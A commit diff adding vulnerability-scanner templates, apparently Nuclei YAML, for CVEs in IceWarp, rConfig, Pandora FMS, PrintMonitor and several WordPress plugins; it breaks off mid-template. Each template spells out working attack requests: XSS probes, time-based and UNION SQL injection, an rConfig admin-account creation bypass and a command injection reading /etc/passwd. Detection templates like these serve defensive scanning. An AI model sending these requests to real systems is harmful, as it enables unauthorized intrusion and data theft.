templates added
parent
f08daa5e82
commit
1b2fddb9cb
|
@ -0,0 +1,36 @@
|
||||||
|
id: CVE-2023-37728
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Icewarp Icearp v10.2.1 - Cross Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
|
||||||
|
reference:
|
||||||
|
- https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-37728
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.favicon.hash:2144485375
|
||||||
|
tags: cve,cve2023,icearp,icewarp,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
|
||||||
|
- "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")'
|
||||||
|
- 'contains(body, "<img src onerror=alert(document.domain)>")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2015-20067
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WP Attachment Export < 0.2.4 - Unrestricted File Download
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress
|
||||||
|
powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a
|
||||||
|
- https://packetstormsecurity.com/files/132693/
|
||||||
|
- https://seclists.org/fulldisclosure/2015/Jul/73
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-20067
|
||||||
|
classification:
|
||||||
|
cve-id: CVE-2015-20067
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cwe-id: 862
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2015,wordpress,wp,wp-plugin,access,control,unauth
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true"
|
||||||
|
- "{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(header, "text/xml")'
|
||||||
|
- 'contains_all(body, "title","wp:author_id","wp:author_email")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,48 @@
|
||||||
|
id: CVE-2018-7282
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: TITool PrintMonitor - Blind SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.
|
||||||
|
remediation: Upgrade to PM18.2.1.
|
||||||
|
reference:
|
||||||
|
- https://fenceposterror.github.io/cve-2018-7282.txt
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-7282
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2018-7282
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
shodan-query: title:"PrintMonitor"
|
||||||
|
max-request: 1
|
||||||
|
cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:*
|
||||||
|
vendor: titool
|
||||||
|
product": printmonitor
|
||||||
|
tags: cve,cve2018,sqli,printmonitor,unauth
|
||||||
|
|
||||||
|
variables:
|
||||||
|
username: "{{rand_base(6)}}"
|
||||||
|
password: "{{rand_base(8)}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
POST /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en
|
||||||
|
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=6'
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(body, "PrintMonitor") && contains(header, "text/html")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,37 @@
|
||||||
|
id: CVE-2019-15829
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Gallery Photoblocks < 1.1.43 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/9443
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-15829
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
|
||||||
|
- 'contains(body_2, "post galleries!")'
|
||||||
|
condition: and
|
|
@ -1,49 +1,39 @@
|
||||||
id: CVE-2020-10220
|
id: CVE-2020-10220
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: rConfig 3.9 - SQL injection
|
name: rConfig 3.9 - SQL Injection
|
||||||
author: ritikchaddha
|
author: theamanrawat
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
|
An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
|
||||||
remediation: |
|
|
||||||
Upgrade to a patched version of rConfig or apply the vendor-supplied patch to mitigate this vulnerability.
|
|
||||||
reference:
|
reference:
|
||||||
- http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html
|
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||||
|
- https://www.exploit-db.com/exploits/48208
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-10220
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-10220
|
||||||
- http://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html
|
|
||||||
- http://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html
|
|
||||||
- https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
|
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 9.8
|
cvss-score: 9.8
|
||||||
cve-id: CVE-2020-10220
|
cve-id: CVE-2020-10220
|
||||||
cwe-id: CWE-89
|
cwe-id: CWE-89
|
||||||
epss-score: 0.02204
|
|
||||||
epss-percentile: 0.88193
|
|
||||||
cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
|
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 1
|
shodan-query: http.title:"rConfig"
|
||||||
vendor: rconfig
|
tags: cve,cve2020,rconfig,sqli
|
||||||
product: rconfig
|
|
||||||
shodan-query: title:"rConfig"
|
|
||||||
tags: packetstorm,cve,cve2020,rconfig,sqli
|
|
||||||
variables:
|
variables:
|
||||||
num: "999999999"
|
num: 999999999
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- method: GET
|
||||||
- |
|
path:
|
||||||
GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1
|
- "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
|
||||||
Host: {{Hostname}}
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- '{{md5({{num}})}}'
|
- "{{md5(num)}}"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -0,0 +1,48 @@
|
||||||
|
id: CVE-2020-12256
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.4 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript.
|
||||||
|
reference:
|
||||||
|
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||||
|
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-12256
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 5.4
|
||||||
|
cve-id: CVE-2020-12256
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
shodan-query: http.title:"rConfig"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2020,rconfig,authenticated,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /devicemgmt.php?deviceId="><script>alert(document.domain)</script> HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_3 == 200'
|
||||||
|
- 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
|
||||||
|
- 'contains(content_type_3, "text/html")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,48 @@
|
||||||
|
id: CVE-2020-12259
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.4 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php
|
||||||
|
reference:
|
||||||
|
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||||
|
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-12259
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 5.4
|
||||||
|
cve-id: CVE-2020-12259
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
shodan-query: http.title:"rConfig"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2020,rconfig,authenticated,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /configDevice.php?rid="><script>alert(document.domain)</script> HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_3 == 200'
|
||||||
|
- 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
|
||||||
|
- 'contains(content_type_3, "text/html")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,95 @@
|
||||||
|
id: CVE-2020-13638
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9 - Authentication Bypass(Admin Login)
|
||||||
|
author: theamanrawat
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7.
|
||||||
|
reference:
|
||||||
|
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||||
|
- https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-13638
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2020-13638
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.title:"rConfig"
|
||||||
|
tags: cve,cve2020,rconfig,authenticatio-bypass,escalation
|
||||||
|
|
||||||
|
variables:
|
||||||
|
username: "{{to_lower(rand_text_alpha(5))}}"
|
||||||
|
password: "{{rand_text_alphanumeric(12)}}!"
|
||||||
|
email: "{{rand_base(8)}}@{{rand_base(5)}}.com"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb
|
||||||
|
|
||||||
|
--01b28e152ee044338224bf647275f8eb
|
||||||
|
Content-Disposition: form-data; name="username"
|
||||||
|
|
||||||
|
{{username}}
|
||||||
|
--01b28e152ee044338224bf647275f8eb
|
||||||
|
Content-Disposition: form-data; name="passconf"
|
||||||
|
|
||||||
|
{{password}}
|
||||||
|
--01b28e152ee044338224bf647275f8eb
|
||||||
|
Content-Disposition: form-data; name="password"
|
||||||
|
|
||||||
|
{{password}}
|
||||||
|
--01b28e152ee044338224bf647275f8eb
|
||||||
|
Content-Disposition: form-data; name="email"
|
||||||
|
|
||||||
|
{{email}}
|
||||||
|
--01b28e152ee044338224bf647275f8eb
|
||||||
|
Content-Disposition: form-data; name="editid"
|
||||||
|
|
||||||
|
|
||||||
|
--01b28e152ee044338224bf647275f8eb
|
||||||
|
Content-Disposition: form-data; name="add"
|
||||||
|
|
||||||
|
add
|
||||||
|
--01b28e152ee044338224bf647275f8eb
|
||||||
|
Content-Disposition: form-data; name="ulevelid"
|
||||||
|
|
||||||
|
9
|
||||||
|
--01b28e152ee044338224bf647275f8eb--
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /lib/crud/userprocess.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
user={{username}}&pass={{password}}&sublogin=1
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_3
|
||||||
|
words:
|
||||||
|
- "rConfig - Configuration Management"
|
||||||
|
- "Logged in as"
|
||||||
|
- "dashboadFieldSet"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header_3
|
||||||
|
words:
|
||||||
|
- 'text/html'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,46 @@
|
||||||
|
id: CVE-2020-13851
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Artica Pandora FMS 7.44 - Remote Code Execution
|
||||||
|
author: theamanrawat
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Artica Pandora FMS 7.44 allows remote command execution via the events feature.
|
||||||
|
reference:
|
||||||
|
- https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-13851
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cve-id: CVE-2022-13851
|
||||||
|
cwe-id: CWE-78
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
shodan-query: title:"Pandora FMS"
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2020,rce,pandora,unauth,artica
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- 'root:.*:0:0:'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
- "PHPSESSID="
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,56 @@
|
||||||
|
id: CVE-2020-8615
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
|
||||||
|
remediation: update to v.1.5.3
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8615
|
||||||
|
- https://wpscan.com/vulnerability/10058
|
||||||
|
- http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
|
||||||
|
cvss-score: 6.5
|
||||||
|
cwe-id: CWE-352
|
||||||
|
cve-id: CVE-2020-8615
|
||||||
|
cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
publicwww-query: "/wp-content/plugins/tutor/"
|
||||||
|
tags: cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress,wpscan
|
||||||
|
|
||||||
|
variables:
|
||||||
|
user: "{{rand_base(6)}}"
|
||||||
|
pass: "{{rand_base(8)}}"
|
||||||
|
email: "{{randstr}}@{{rand_base(5)}}.com"
|
||||||
|
firstname: "{{rand_base(5)}}"
|
||||||
|
lastname: "{{rand_base(5)}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(content_type_2, "application/json")'
|
||||||
|
- 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
condition: and
|
|
@ -0,0 +1,45 @@
|
||||||
|
id: CVE-2021-24215
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Controlled Admin Access WordPress Plugin <= 1.4.0 - Improper Access Control & Privilege Escalation
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
An Improper Access Control vulnerability was discovered in the plugin. Uncontrolled access to the website customization functionality and global CMS settings, like /wp-admin/customization.php and /wp-admin/options.php, can lead to a complete compromise of the target resource.
|
||||||
|
remediation: Fixed in version 1.5.2
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/eec0f29f-a985-4285-8eed-d1855d204a20
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24215
|
||||||
|
- https://www.opencve.io/cve/CVE-2021-24215
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cwe-id: CWE-284
|
||||||
|
cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
publicwww-query: "/wp-content/plugins/controlled-admin-access/"
|
||||||
|
tags: cve,cve2021,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/options.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2, "This page allows direct access to your site settings") && contains(body_2, "Controlled Admin Access")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,45 @@
|
||||||
|
id: CVE-2021-24286
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.
|
||||||
|
remediation: Fixed in version 1.3.1
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27
|
||||||
|
- https://www.exploit-db.com/exploits/50350
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24286
|
||||||
|
- https://wordpress.org/plugins/redirect-404-to-parent/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: xss,cve,cve2023,wordpress,wpscan,authenticated,exploitdb,wp-plugin
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
- 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")'
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
condition: and
|
|
@ -0,0 +1,57 @@
|
||||||
|
id: CVE-2021-24627
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: G Auto-Hyperlink <= 1.0.1 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The G Auto-Hyperlink WordPress plugin through 1.0.1 does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection
|
||||||
|
reference:
|
||||||
|
- https://wordpress.org/plugins/g-auto-hyperlink/
|
||||||
|
- https://wpscan.com/vulnerability/c04ea768-150f-41b8-b08c-78d1ae006bbb
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24627
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 7.2
|
||||||
|
cve-id: CVE-2021-24627
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/g-auto-hyperlink/"
|
||||||
|
tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated
|
||||||
|
|
||||||
|
variables:
|
||||||
|
num: 999999999
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+I
|
||||||
